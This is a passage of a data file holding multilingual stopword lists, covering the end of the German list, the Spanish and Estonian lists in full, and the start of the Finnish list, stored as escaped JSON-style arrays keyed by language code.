\"niemanden\",\n        \"noch\",\n       
 \"nun\",\n        \"nur\",\n        \"o\",\n        \"ob\",\n        \"oben\",\n        \"oder\",\n        \"offen\",\n        \"oft\",\n        \"ohne\",\n        \"p\",\n        \"q\",\n        \"r\",\n        \"recht\",\n        \"rechte\",\n        \"rechten\",\n        \"rechter\",\n        \"rechtes\",\n        \"richtig\",\n        \"rund\",\n        \"s\",\n        \"sa\",\n        \"sache\",\n        \"sagt\",\n        \"sagte\",\n        \"sah\",\n        \"satt\",\n        \"schlecht\",\n        \"schon\",\n        \"sechs\",\n        \"sechste\",\n        \"sechsten\",\n        \"sechster\",\n        \"sechstes\",\n        \"sehr\",\n        \"sei\",\n        \"seid\",\n        \"seien\",\n        \"sein\",\n        \"seine\",\n        \"seinem\",\n        \"seinen\",\n        \"seiner\",\n        \"seines\",\n        \"seit\",\n        \"seitdem\",\n        \"selbst\",\n        \"sich\",\n        \"sie\",\n        \"sieben\",\n        \"siebente\",\n        \"siebenten\",\n        \"siebenter\",\n        \"siebentes\",\n        \"sind\",\n        \"so\",\n        \"solang\",\n        \"solche\",\n        \"solchem\",\n        \"solchen\",\n        \"solcher\",\n        \"solches\",\n        \"soll\",\n        \"sollen\",\n        \"sollst\",\n        \"sollt\",\n        \"sollte\",\n        \"sollten\",\n        \"sondern\",\n        \"sonst\",\n        \"soweit\",\n        \"sowie\",\n        \"später\",\n        \"startseite\",\n        \"statt\",\n        \"steht\",\n        \"suche\",\n        \"t\",\n        \"tag\",\n        \"tage\",\n        \"tagen\",\n        \"tat\",\n        \"teil\",\n        \"tel\",\n        \"tritt\",\n        \"trotzdem\",\n        \"tun\",\n        \"u\",\n        \"uhr\",\n        \"um\",\n        \"und\",\n        \"und?\",\n        \"uns\",\n        \"unser\",\n        \"unsere\",\n        \"unserer\",\n        \"unter\",\n        \"v\",\n        \"vergangenen\",\n        \"viel\",\n        \"viele\",\n        
\"vielem\",\n        \"vielen\",\n        \"vielleicht\",\n        \"vier\",\n        \"vierte\",\n        \"vierten\",\n        \"vierter\",\n        \"viertes\",\n        \"vom\",\n        \"von\",\n        \"vor\",\n        \"w\",\n        \"wahr?\",\n        \"wann\",\n        \"war\",\n        \"waren\",\n        \"wart\",\n        \"warum\",\n        \"was\",\n        \"wegen\",\n        \"weil\",\n        \"weit\",\n        \"weiter\",\n        \"weitere\",\n        \"weiteren\",\n        \"weiteres\",\n        \"welche\",\n        \"welchem\",\n        \"welchen\",\n        \"welcher\",\n        \"welches\",\n        \"wem\",\n        \"wen\",\n        \"wenig\",\n        \"wenige\",\n        \"weniger\",\n        \"weniges\",\n        \"wenigstens\",\n        \"wenn\",\n        \"wer\",\n        \"werde\",\n        \"werden\",\n        \"werdet\",\n        \"weshalb\",\n        \"wessen\",\n        \"wie\",\n        \"wieder\",\n        \"wieso\",\n        \"will\",\n        \"willst\",\n        \"wir\",\n        \"wird\",\n        \"wirklich\",\n        \"wirst\",\n        \"wissen\",\n        \"wo\",\n        \"wohl\",\n        \"wollen\",\n        \"wollt\",\n        \"wollte\",\n        \"wollten\",\n        \"worden\",\n        \"wurde\",\n        \"wurden\",\n        \"während\",\n        \"währenddem\",\n        \"währenddessen\",\n        \"wäre\",\n        \"würde\",\n        \"würden\",\n        \"x\",\n        \"y\",\n        \"z\",\n        \"z.b\",\n        \"zehn\",\n        \"zehnte\",\n        \"zehnten\",\n        \"zehnter\",\n        \"zehntes\",\n        \"zeit\",\n        \"zu\",\n        \"zuerst\",\n        \"zugleich\",\n        \"zum\",\n        \"zunächst\",\n        \"zur\",\n        \"zurück\",\n        \"zusammen\",\n        \"zwanzig\",\n        \"zwar\",\n        \"zwei\",\n        \"zweite\",\n        \"zweiten\",\n        \"zweiter\",\n        \"zweites\",\n        \"zwischen\",\n        \"zwölf\",\n        \"über\",\n      
  \"überhaupt\",\n        \"übrigens\",\n    ],\n    \"es\": [\n        \"a\",\n        \"actualmente\",\n        \"acuerdo\",\n        \"adelante\",\n        \"ademas\",\n        \"además\",\n        \"adrede\",\n        \"afirmó\",\n        \"agregó\",\n        \"ahi\",\n        \"ahora\",\n        \"ahí\",\n        \"al\",\n        \"algo\",\n        \"alguna\",\n        \"algunas\",\n        \"alguno\",\n        \"algunos\",\n        \"algún\",\n        \"alli\",\n        \"allí\",\n        \"alrededor\",\n        \"ambos\",\n        \"ampleamos\",\n        \"antano\",\n        \"antaño\",\n        \"ante\",\n        \"anterior\",\n        \"antes\",\n        \"apenas\",\n        \"aproximadamente\",\n        \"aquel\",\n        \"aquella\",\n        \"aquellas\",\n        \"aquello\",\n        \"aquellos\",\n        \"aqui\",\n        \"aquél\",\n        \"aquélla\",\n        \"aquéllas\",\n        \"aquéllos\",\n        \"aquí\",\n        \"arriba\",\n        \"arribaabajo\",\n        \"aseguró\",\n        \"asi\",\n        \"así\",\n        \"atras\",\n        \"aun\",\n        \"aunque\",\n        \"ayer\",\n        \"añadió\",\n        \"aún\",\n        \"b\",\n        \"bajo\",\n        \"bastante\",\n        \"bien\",\n        \"breve\",\n        \"buen\",\n        \"buena\",\n        \"buenas\",\n        \"bueno\",\n        \"buenos\",\n        \"c\",\n        \"cada\",\n        \"casi\",\n        \"cerca\",\n        \"cierta\",\n        \"ciertas\",\n        \"cierto\",\n        \"ciertos\",\n        \"cinco\",\n        \"claro\",\n        \"comentó\",\n        \"como\",\n        \"con\",\n        \"conmigo\",\n        \"conocer\",\n        \"conseguimos\",\n        \"conseguir\",\n        \"considera\",\n        \"consideró\",\n        \"consigo\",\n        \"consigue\",\n        \"consiguen\",\n        \"consigues\",\n        \"contigo\",\n        \"contra\",\n        \"cosas\",\n        \"creo\",\n        \"cual\",\n        \"cuales\",\n        
\"cualquier\",\n        \"cuando\",\n        \"cuanta\",\n        \"cuantas\",\n        \"cuanto\",\n        \"cuantos\",\n        \"cuatro\",\n        \"cuenta\",\n        \"cuál\",\n        \"cuáles\",\n        \"cuándo\",\n        \"cuánta\",\n        \"cuántas\",\n        \"cuánto\",\n        \"cuántos\",\n        \"cómo\",\n        \"d\",\n        \"da\",\n        \"dado\",\n        \"dan\",\n        \"dar\",\n        \"de\",\n        \"debajo\",\n        \"debe\",\n        \"deben\",\n        \"debido\",\n        \"decir\",\n        \"dejó\",\n        \"del\",\n        \"delante\",\n        \"demasiado\",\n        \"demás\",\n        \"dentro\",\n        \"deprisa\",\n        \"desde\",\n        \"despacio\",\n        \"despues\",\n        \"después\",\n        \"detras\",\n        \"detrás\",\n        \"dia\",\n        \"dias\",\n        \"dice\",\n        \"dicen\",\n        \"dicho\",\n        \"dieron\",\n        \"diferente\",\n        \"diferentes\",\n        \"dijeron\",\n        \"dijo\",\n        \"dio\",\n        \"donde\",\n        \"dos\",\n        \"durante\",\n        \"día\",\n        \"días\",\n        \"dónde\",\n        \"e\",\n        \"ejemplo\",\n        \"el\",\n        \"ella\",\n        \"ellas\",\n        \"ello\",\n        \"ellos\",\n        \"embargo\",\n        \"empleais\",\n        \"emplean\",\n        \"emplear\",\n        \"empleas\",\n        \"empleo\",\n        \"en\",\n        \"encima\",\n        \"encuentra\",\n        \"enfrente\",\n        \"enseguida\",\n        \"entonces\",\n        \"entre\",\n        \"era\",\n        \"eramos\",\n        \"eran\",\n        \"eras\",\n        \"eres\",\n        \"es\",\n        \"esa\",\n        \"esas\",\n        \"ese\",\n        \"eso\",\n        \"esos\",\n        \"esta\",\n        \"estaba\",\n        \"estaban\",\n        \"estado\",\n        \"estados\",\n        \"estais\",\n        \"estamos\",\n        \"estan\",\n        \"estar\",\n        \"estará\",\n        
\"estas\",\n        \"este\",\n        \"esto\",\n        \"estos\",\n        \"estoy\",\n        \"estuvo\",\n        \"está\",\n        \"están\",\n        \"ex\",\n        \"excepto\",\n        \"existe\",\n        \"existen\",\n        \"explicó\",\n        \"expresó\",\n        \"f\",\n        \"fin\",\n        \"final\",\n        \"fue\",\n        \"fuera\",\n        \"fueron\",\n        \"fui\",\n        \"fuimos\",\n        \"g\",\n        \"general\",\n        \"gran\",\n        \"grandes\",\n        \"gueno\",\n        \"h\",\n        \"ha\",\n        \"haber\",\n        \"habia\",\n        \"habla\",\n        \"hablan\",\n        \"habrá\",\n        \"había\",\n        \"habían\",\n        \"hace\",\n        \"haceis\",\n        \"hacemos\",\n        \"hacen\",\n        \"hacer\",\n        \"hacerlo\",\n        \"haces\",\n        \"hacia\",\n        \"haciendo\",\n        \"hago\",\n        \"han\",\n        \"hasta\",\n        \"hay\",\n        \"haya\",\n        \"he\",\n        \"hecho\",\n        \"hemos\",\n        \"hicieron\",\n        \"hizo\",\n        \"horas\",\n        \"hoy\",\n        \"hubo\",\n        \"i\",\n        \"igual\",\n        \"incluso\",\n        \"indicó\",\n        \"informo\",\n        \"informó\",\n        \"intenta\",\n        \"intentais\",\n        \"intentamos\",\n        \"intentan\",\n        \"intentar\",\n        \"intentas\",\n        \"intento\",\n        \"ir\",\n        \"j\",\n        \"junto\",\n        \"k\",\n        \"l\",\n        \"la\",\n        \"lado\",\n        \"largo\",\n        \"las\",\n        \"le\",\n        \"lejos\",\n        \"les\",\n        \"llegó\",\n        \"lleva\",\n        \"llevar\",\n        \"lo\",\n        \"los\",\n        \"luego\",\n        \"lugar\",\n        \"m\",\n        \"mal\",\n        \"manera\",\n        \"manifestó\",\n        \"mas\",\n        \"mayor\",\n        \"me\",\n        \"mediante\",\n        \"medio\",\n        \"mejor\",\n        \"mencionó\",\n      
  \"menos\",\n        \"menudo\",\n        \"mi\",\n        \"mia\",\n        \"mias\",\n        \"mientras\",\n        \"mio\",\n        \"mios\",\n        \"mis\",\n        \"misma\",\n        \"mismas\",\n        \"mismo\",\n        \"mismos\",\n        \"modo\",\n        \"momento\",\n        \"mucha\",\n        \"muchas\",\n        \"mucho\",\n        \"muchos\",\n        \"muy\",\n        \"más\",\n        \"mí\",\n        \"mía\",\n        \"mías\",\n        \"mío\",\n        \"míos\",\n        \"n\",\n        \"nada\",\n        \"nadie\",\n        \"ni\",\n        \"ninguna\",\n        \"ningunas\",\n        \"ninguno\",\n        \"ningunos\",\n        \"ningún\",\n        \"no\",\n        \"nos\",\n        \"nosotras\",\n        \"nosotros\",\n        \"nuestra\",\n        \"nuestras\",\n        \"nuestro\",\n        \"nuestros\",\n        \"nueva\",\n        \"nuevas\",\n        \"nuevo\",\n        \"nuevos\",\n        \"nunca\",\n        \"o\",\n        \"ocho\",\n        \"os\",\n        \"otra\",\n        \"otras\",\n        \"otro\",\n        \"otros\",\n        \"p\",\n        \"pais\",\n        \"para\",\n        \"parece\",\n        \"parte\",\n        \"partir\",\n        \"pasada\",\n        \"pasado\",\n        \"paìs\",\n        \"peor\",\n        \"pero\",\n        \"pesar\",\n        \"poca\",\n        \"pocas\",\n        \"poco\",\n        \"pocos\",\n        \"podeis\",\n        \"podemos\",\n        \"poder\",\n        \"podria\",\n        \"podriais\",\n        \"podriamos\",\n        \"podrian\",\n        \"podrias\",\n        \"podrá\",\n        \"podrán\",\n        \"podría\",\n        \"podrían\",\n        \"poner\",\n        \"por\",\n        \"porque\",\n        \"posible\",\n        \"primer\",\n        \"primera\",\n        \"primero\",\n        \"primeros\",\n        \"principalmente\",\n        \"pronto\",\n        \"propia\",\n        \"propias\",\n        \"propio\",\n        \"propios\",\n        \"proximo\",\n        
\"próximo\",\n        \"próximos\",\n        \"pudo\",\n        \"pueda\",\n        \"puede\",\n        \"pueden\",\n        \"puedo\",\n        \"pues\",\n        \"q\",\n        \"qeu\",\n        \"que\",\n        \"quedó\",\n        \"queremos\",\n        \"quien\",\n        \"quienes\",\n        \"quiere\",\n        \"quiza\",\n        \"quizas\",\n        \"quizá\",\n        \"quizás\",\n        \"quién\",\n        \"quiénes\",\n        \"qué\",\n        \"r\",\n        \"raras\",\n        \"realizado\",\n        \"realizar\",\n        \"realizó\",\n        \"repente\",\n        \"respecto\",\n        \"s\",\n        \"sabe\",\n        \"sabeis\",\n        \"sabemos\",\n        \"saben\",\n        \"saber\",\n        \"sabes\",\n        \"salvo\",\n        \"se\",\n        \"sea\",\n        \"sean\",\n        \"segun\",\n        \"segunda\",\n        \"segundo\",\n        \"según\",\n        \"seis\",\n        \"ser\",\n        \"sera\",\n        \"será\",\n        \"serán\",\n        \"sería\",\n        \"señaló\",\n        \"si\",\n        \"sido\",\n        \"siempre\",\n        \"siendo\",\n        \"siete\",\n        \"sigue\",\n        \"siguiente\",\n        \"sin\",\n        \"sino\",\n        \"sobre\",\n        \"sois\",\n        \"sola\",\n        \"solamente\",\n        \"solas\",\n        \"solo\",\n        \"solos\",\n        \"somos\",\n        \"son\",\n        \"soy\",\n        \"soyos\",\n        \"su\",\n        \"supuesto\",\n        \"sus\",\n        \"suya\",\n        \"suyas\",\n        \"suyo\",\n        \"sé\",\n        \"sí\",\n        \"sólo\",\n        \"t\",\n        \"tal\",\n        \"tambien\",\n        \"también\",\n        \"tampoco\",\n        \"tan\",\n        \"tanto\",\n        \"tarde\",\n        \"te\",\n        \"temprano\",\n        \"tendrá\",\n        \"tendrán\",\n        \"teneis\",\n        \"tenemos\",\n        \"tener\",\n        \"tenga\",\n        \"tengo\",\n        \"tenido\",\n        \"tenía\",\n        
\"tercera\",\n        \"ti\",\n        \"tiempo\",\n        \"tiene\",\n        \"tienen\",\n        \"toda\",\n        \"todas\",\n        \"todavia\",\n        \"todavía\",\n        \"todo\",\n        \"todos\",\n        \"total\",\n        \"trabaja\",\n        \"trabajais\",\n        \"trabajamos\",\n        \"trabajan\",\n        \"trabajar\",\n        \"trabajas\",\n        \"trabajo\",\n        \"tras\",\n        \"trata\",\n        \"través\",\n        \"tres\",\n        \"tu\",\n        \"tus\",\n        \"tuvo\",\n        \"tuya\",\n        \"tuyas\",\n        \"tuyo\",\n        \"tuyos\",\n        \"tú\",\n        \"u\",\n        \"ultimo\",\n        \"un\",\n        \"una\",\n        \"unas\",\n        \"uno\",\n        \"unos\",\n        \"usa\",\n        \"usais\",\n        \"usamos\",\n        \"usan\",\n        \"usar\",\n        \"usas\",\n        \"uso\",\n        \"usted\",\n        \"ustedes\",\n        \"v\",\n        \"va\",\n        \"vais\",\n        \"valor\",\n        \"vamos\",\n        \"van\",\n        \"varias\",\n        \"varios\",\n        \"vaya\",\n        \"veces\",\n        \"ver\",\n        \"verdad\",\n        \"verdadera\",\n        \"verdadero\",\n        \"vez\",\n        \"vosotras\",\n        \"vosotros\",\n        \"voy\",\n        \"vuestra\",\n        \"vuestras\",\n        \"vuestro\",\n        \"vuestros\",\n        \"w\",\n        \"x\",\n        \"y\",\n        \"ya\",\n        \"yo\",\n        \"z\",\n        \"él\",\n        \"ésa\",\n        \"ésas\",\n        \"ése\",\n        \"ésos\",\n        \"ésta\",\n        \"éstas\",\n        \"éste\",\n        \"éstos\",\n        \"última\",\n        \"últimas\",\n        \"último\",\n        \"últimos\",\n    ],\n    \"et\": [\n        \"aga\",\n        \"ei\",\n        \"et\",\n        \"ja\",\n        \"jah\",\n        \"kas\",\n        \"kui\",\n        \"kõik\",\n        \"ma\",\n        \"me\",\n        \"mida\",\n        \"midagi\",\n        \"mind\",\n        
\"minu\",\n        \"mis\",\n        \"mu\",\n        \"mul\",\n        \"mulle\",\n        \"nad\",\n        \"nii\",\n        \"oled\",\n        \"olen\",\n        \"oli\",\n        \"oma\",\n        \"on\",\n        \"pole\",\n        \"sa\",\n        \"seda\",\n        \"see\",\n        \"selle\",\n        \"siin\",\n        \"siis\",\n        \"ta\",\n        \"te\",\n        \"ära\",\n    ],\n    \"fi\": [\n        \"aiemmin\",\n        \"aika\",\n        \"aikaa\",\n        \"aikaan\",\n        \"aikaisemmin\",\n        \"aikaisin\",\n        \"aikajen\",\n        \"aikana\",\n        \"aikoina\",\n        \"aikoo\",\n        \"aikovat\",\n        \"aina\",\n        \"ainakaan\",\n        \"ainakin\",\n        \"ainoa\",\n        \"ainoat\",\n        \"aiomme\",\n        \"aion\",\n        \"aiotte\",\n        \"aist\",\n        \"aivan\",\n        \"ajan\",\n        \"alas\",\n        \"alemmas\",\n        \"alkuisin\",\n        \"alkuun\",\n        \"alla\",\n        \"alle\",\n        \"aloitamme\",\n        \"aloitan\",\n        \"aloitat\",\n        \"aloitatte\",\n        \"aloitattivat\",\n        \"aloitettava\",\n        \"aloitettevaksi\",\n        \"aloitettu\",\n        \"aloitimme\",\n        \"aloitin\",\n        \"aloitit\",\n        \"aloititte\",\n        \"aloittaa\",\n        \"aloittamatta\",\n        \"aloitti\",\n        \"aloittivat\",\n        \"alta\",\n        \"aluksi\",\n        \"alussa\",\n        \"alusta\",\n        \"annettavaksi\",\n        \"annetteva\",\n        \"annettu\",\n        \"ansiosta\",\n        \"antaa\",\n        \"antamatta\",\n        \"antoi\",\n        \"aoua\",\n        \"apu\",\n        \"asia\",\n        \"asiaa\",\n        \"asian\",\n        \"asiasta\",\n        \"asiat\",\n        \"asioiden\",\n        \"asioihin\",\n        \"asioita\",\n        \"asti\",\n        \"avuksi\",\n        \"avulla\",\n        \"avun\",\n        \"avutta\",\n        \"edelle\",\n        \"edelleen\",\n        
\"edellä\",\n        \"edeltä\",\n        \"edemmäs\",\n        \"edes\",\n        \"edessä\",\n        \"edestä\",\n        \"ehkä\",\n        \"ei\",\n        \"eikä\",\n        \"eilen\",\n        \"eivät\",\n        \"eli\",\n        \"ellei\",\n        \"elleivät\",\n        \"ellemme\",\n        \"ellen\",\n        \"ellet\",\n        \"ellette\",\n        \"emme\",\n        \"en\",\n        \"enemmän\",\n        \"eniten\",\n        \"ennen\",\n        \"ensi\",\n        \"ensimmäinen\",\n        \"ensimmäiseksi\",\n        \"ensimmäisen\",\n        \"ensimmäisenä\",\n        \"ensimmäiset\",\n        \"ensimmäisiksi\",\n        \"ensimmäisinä\",\n        \"ensimmäisiä\",\n        \"ensimmäistä\",\n        \"ensin\",\n        \"entinen\",\n        \"entisen\",\n        \"entisiä\",\n        \"entisten\",\n        \"entistä\",\n        \"enää\",\n        \"eri\",\n        \"erittäin\",\n        \"erityisesti\",\n        \"eräiden\",\n        \"eräs\",\n        \"eräät\",\n        \"esi\",\n        \"esiin\",\n        \"esillä\",\n        \"esimerkiksi\",\n        \"et\",\n        \"eteen\",\n        \"etenkin\",\n        \"etessa\",\n        \"ette\",\n        \"ettei\",\n        \"että\",\n        \"haikki\",\n        \"halua\",\n        \"haluaa\",\n        \"haluamatta\",\n        \"haluamme\",\n        \"haluan\",\n        \"haluat\",\n        \"haluatte\",\n        \"haluavat\",\n        \"halunnut\",\n        \"halusi\",\n        \"halusimme\",\n        \"halusin\",\n        \"halusit\",\n        \"halusitte\",\n        \"halusivat\",\n        \"halutessa\",\n        \"haluton\",\n        \"he\",\n        \"hei\",\n        \"heidän\",\n        \"heihin\",\n        \"heille\",\n        \"heiltä\",\n        \"heissä\",\n        \"heistä\",\n        \"heitä\",\n        \"helposti\",\n        \"heti\",\n        \"hetkellä\",\n        \"hieman\",\n        \"hitaasti\",\n        \"hoikein\",\n        \"huolimatta\",\n        \"huomenna\",\n        
\"hyvien\",\n        \"hyviin\",\n        \"hyviksi\",\n        \"hyville\",\n        \"hyviltä\",\n        \"hyvin\",\n        \"hyvinä\",\n        \"hyvissä\",\n        \"hyvistä\",\n        \"hyviä\",\n        \"hyvä\",\n        \"hyvät\",\n        \"hyvää\",\n        \"hän\",\n        \"häneen\",\n        \"hänelle\",\n        \"hänellä\",\n        \"häneltä\",\n        \"hänen\",\n        \"hänessä\",\n        \"hänestä\",\n        \"hänet\",\n        \"ihan\",\n        \"ilman\",\n        \"ilmeisesti\",\n        \"itse\",\n        \"itsensä\",\n        \"itseään\",\n        \"ja\",\n        \"jo\",\n        \"johon\",\n        \"joiden\",\n        \"joihin\",\n        \"joiksi\",\n        \"joilla\",\n        \"joille\",\n        \"joilta\",\n        \"joissa\",\n        \"joista\",\n        \"joita\",\n        \"joka\",\n        \"jokainen\",\n        \"jokin\",\n        \"joko\",\n        \"joku\",\n        \"jolla\",\n        \"jolle\",\n        \"jolloin\",\n        \"jolta\",\n        \"jompikumpi\",\n        \"jonka\",\n        \"jonkin\",\n        \"jonne\",\n        \"joo\",\n        \"jopa\",\n        \"jos\",\n        \"joskus\",\n        \"jossa\",\n        \"josta\",\n        \"jota\",\n        \"jotain\",\n        \"joten\",\n        \"jotenkin\",\n        \"jotenkuten\",\n        \"jotka\",\n        \"jotta\",\n        \"jouduimme\",\n        \"jouduin\",\n        \"jouduit\",\n        \"jouduitte\",\n        \"joudumme\",\n        \"joudun\",\n        \"joudutte\",\n        \"joukkoon\",\n        \"joukossa\",\n        \"joukosta\",\n        \"joutua\",\n        \"joutui\",\n        \"joutuivat\",\n        \"joutumaan\",\n        \"joutuu\",\n        \"joutuvat\",\n        \"juuri\",\n        \"jälkeen\",\n        \"jälleen\",\n        \"jää\",\n        \"kahdeksan\",\n        \"kahdeksannen\",\n        \"kahdella\",\n        \"kahdelle\",\n        \"kahdelta\",\n        \"kahden\",\n        \"kahdessa\",\n        \"kahdesta\",\n        
\"kahta\",\n        \"kahteen\",\n        \"kai\",\n        \"kaiken\",\n        \"kaikille\",\n        \"kaikilta\",\n        \"kaikkea\",\n        \"kaikki\",\n        \"kaikkia\",\n        \"kaikkiaan\",\n        \"kaikkialla\",\n        \"kaikkialle\",\n        \"kaikkialta\",\n        \"kaikkien\",\n        \"kaikkin\",\n        \"kaksi\",\n        \"kannalta\",\n        \"kannattaa\",\n        \"kanssa\",\n        \"kanssaan\",\n        \"kanssamme\",\n        \"kanssani\",\n        \"kanssanne\",\n        \"kanssasi\",\n        \"kauan\",\n        \"kauemmas\",\n        \"kaukana\",\n        \"kautta\",\n        \"kehen\",\n        \"keiden\",\n        \"keihin\",\n        \"keiksi\",\n        \"keille\",\n        \"keillä\",\n        \"keiltä\",\n        \"keinä\",\n        \"keissä\",\n        \"keistä\",\n        \"keitten\",\n        \"keittä\",\n        \"keitä\",\n        \"keneen\",\n        \"keneksi\",\n        \"kenelle\",\n        \"kenellä\",\n        \"keneltä\",\n        \"kenen\",\n        \"kenenä\",\n        \"kenessä\",\n        \"kenestä\",\n        \"kenet\",\n        \"kenettä\",\n        \"kennessästä\",\n        \"kenties\",\n        \"kerran\",\n        \"kerta\",\n        \"kertaa\",\n        \"keskellä\",\n        \"kesken\",\n        \"keskimäärin\",\n        \"ketkä\",\n        \"ketä\",\n        \"kiitos\",\n        \"kohti\",\n        \"koko\",\n        \"kokonaan\",\n        \"kolmas\",\n        \"kolme\",\n        \"kolmen\",\n        \"kolmesti\",\n        \"koska\",\n        \"koskaan\",\n        \"kovin\",\n        \"kuin\",\n        \"kuinka\",\n        \"kuinkan\",\n        \"kuitenkaan\",\n        \"kuitenkin\",\n        \"kuka\",\n        \"kukaan\",\n        \"kukin\",\n        \"kukka\",\n        \"kumpainen\",\n        \"kumpainenkaan\",\n        \"kumpi\",\n        \"kumpikaan\",\n        \"kumpikin\",\n        \"kun\",\n        \"kuten\",\n        \"kuuden\",\n        \"kuusi\",\n        \"kuutta\",\n        
\"kylliksi\",\n        \"kyllä\",\n        \"kymmenen\",\n        \"kyse\",\n        \"liian\",\n        \"liki\",\n        \"lisäksi\",\n        \"lisää\",\n        \"lla\",\n        \"luo\",\n        \"luona\",\n        \"lähekkäin\",\n        \"lähelle\",\n        \"lähellä\",\n        \"läheltä\",\n        \"lähemmäs\",\n        \"lähes\",\n        \"lähinnä\",\n        \"lähtien\",\n        \"läpi\",\n        \"mahdollisimman\",\n        \"mahdollista\",\n        \"me\",\n        \"meidän\",\n        \"meille\",\n        \"meillä\",\n        \"melkein\",\n        \"melko\",\n        \"menee\",\n        \"meneet\",\n        \"menemme\",\n        \"menen\",\n        \"menet\",\n        \"menette\",\n        \"menevät\",\n        \"meni\",\n        \"menimme\",\n        \"menin\",\n        \"menit\",\n        \"menivät\",\n        \"mennessä\",\n        \"mennyt\",\n        \"menossa\",\n        \"mihin\",\n        \"mikin\",\n        \"miksi\",\n        \"mikä\",\n        \"mikäli\",\n        \"mikään\",\n        \"milloin\",\n        \"milloinkan\",\n        \"minne\",\n        \"minun\",\n        \"minut\",\n        \"minä\",\n        \"missä\",\n        \"mistä\",\n        \"miten\",\n        \"mitä\",\n        \"mitään\",\n        \"moi\",\n        \"molemmat\",\n        \"mones\",\n        \"monesti\",\n        \"monet\",\n        \"moni\",\n        \"moniaalla\",\n        \"moniaalle\",\n        \"moniaalta\",\n        \"monta\",\n        \"muassa\",\n        \"muiden\",\n        \"muita\",\n        \"muka\",\n        \"mukaan\",\n        \"mukaansa\",\n        \"mukana\",\n        \"mutta\",\n        \"muu\",\n        \"muualla\",\n        \"muualle\",\n        \"muualta\",\n        \"muuanne\",\n        \"muulloin\",\n        \"muun\",\n        \"muut\",\n        \"muuta\",\n        \"muutama\",\n        \"muutaman\",\n        \"muuten\",\n        \"myöhemmin\",\n        \"myös\",\n        \"myöskin\",\n        \"myöskään\",\n        \"myötä\",\n        
\"ne\",\n        \"neljä\",\n        \"neljän\",\n        \"neljää\",\n        \"niiden\",\n        \"niin\",\n        \"niistä\",\n        \"niitä\",\n        \"noin\",\n        \"nopeammin\",\n        \"nopeasti\",\n        \"nopeiten\",\n        \"nro\",\n        \"nuo\",\n        \"nyt\",\n        \"näiden\",\n        \"näin\",\n        \"näissä\",\n        \"näissähin\",\n        \"näissälle\",\n        \"näissältä\",\n        \"näissästä\",\n        \"näitä\",\n        \"nämä\",\n        \"ohi\",\n        \"oikea\",\n        \"oikealla\",\n        \"oikein\",\n        \"ole\",\n        \"olemme\",\n        \"olen\",\n        \"olet\",\n        \"olette\",\n        \"oleva\",\n        \"olevan\",\n        \"olevat\",\n        \"oli\",\n        \"olimme\",\n        \"olin\",\n        \"olisi\",\n        \"olisimme\",\n        \"olisin\",\n        \"olisit\",\n        \"olisitte\",\n        \"olisivat\",\n        \"olit\",\n        \"olitte\",\n        \"olivat\",\n        \"olla\",\n        \"olleet\",\n        \"olli\",\n        \"ollut\",\n        \"oma\",\n        \"omaa\",\n        \"omaan\",\n        \"omaksi\",\n        \"omalle\",\n        \"omalta\",\n        \"oman\",\n        \"omassa\",\n        \"omat\",\n        \"omia\",\n        \"omien\",\n        \"omiin\",\n        \"omiksi\",\n        \"omille\",\n        \"omilta\",\n        \"omissa\",\n        \"omista\",\n        \"on\",\n        \"onkin\",\n        \"onko\",\n        \"ovat\",\n        \"paikoittain\",\n        \"paitsi\",\n        \"pakosti\",\n        \"paljon\",\n        \"paremmin\",\n        \"parempi\",\n        \"parhaillaan\",\n        \"parhaiten\",\n        \"perusteella\",\n        \"peräti\",\n        \"pian\",\n        \"pieneen\",\n        \"pieneksi\",\n        \"pienelle\",\n        \"pienellä\",\n        \"pieneltä\",\n        \"pienempi\",\n        \"pienestä\",\n        \"pieni\",\n        \"pienin\",\n        \"puolesta\",\n        \"puolestaan\",\n        
\"päälle\",\n        \"runsaasti\",\n        \"saakka\",\n        \"sadam\",\n        \"sama\",\n        \"samaa\",\n        \"samaan\",\n        \"samalla\",\n        \"samallalta\",\n        \"samallassa\",\n        \"samallasta\",\n        \"saman\",\n        \"samat\",\n        \"samoin\",\n        \"sata\",\n        \"sataa\",\n        \"satojen\",\n        \"se\",\n        \"seitsemän\",\n        \"sekä\",\n        \"sen\",\n        \"seuraavat\",\n        \"siellä\",\n        \"sieltä\",\n        \"siihen\",\n        \"siinä\",\n        \"siis\",\n        \"siitä\",\n        \"sijaan\",\n        \"siksi\",\n        \"silloin\",\n        \"sillä\",\n        \"silti\",\n        \"sinne\",\n        \"sinua\",\n        \"sinulle\",\n        \"sinulta\",\n        \"sinun\",\n        \"sinussa\",\n        \"sinusta\",\n        \"sinut\",\n        \"sinä\",\n        \"sisäkkäin\",\n        \"sisällä\",\n        \"siten\",\n        \"sitten\",\n        \"sitä\",\n        \"ssa\",\n        \"sta\",\n        \"suoraan\",\n        \"suuntaan\",\n        \"suuren\",\n        \"suuret\",\n        \"suuri\",\n        \"suuria\",\n        \"suurin\",\n        \"suurten\",\n        \"taa\",\n        \"taas\",\n        \"taemmas\",\n        \"tahansa\",\n        \"tai\",\n        \"takaa\",\n        \"takaisin\",\n        \"takana\",\n        \"takia\",\n        \"tapauksessa\",\n        \"tarpeeksi\",\n        \"tavalla\",\n        \"tavoitteena\",\n        \"te\",\n        \"tietysti\",\n        \"todella\",\n        \"toinen\",\n        \"toisaalla\",\n        \"toisaalle\",\n        \"toisaalta\",\n        \"toiseen\",\n        \"toiseksi\",\n        \"toisella\",\n        \"toiselle\",\n        \"toiselta\",\n        \"toisemme\",\n        \"toisen\",\n        \"toisensa\",\n        \"toisessa\",\n        \"toisesta\",\n        \"toista\",\n        \"toistaiseksi\",\n        \"toki\",\n        \"tosin\",\n        \"tuhannen\",\n        \"tuhat\",\n        \"tule\",\n    
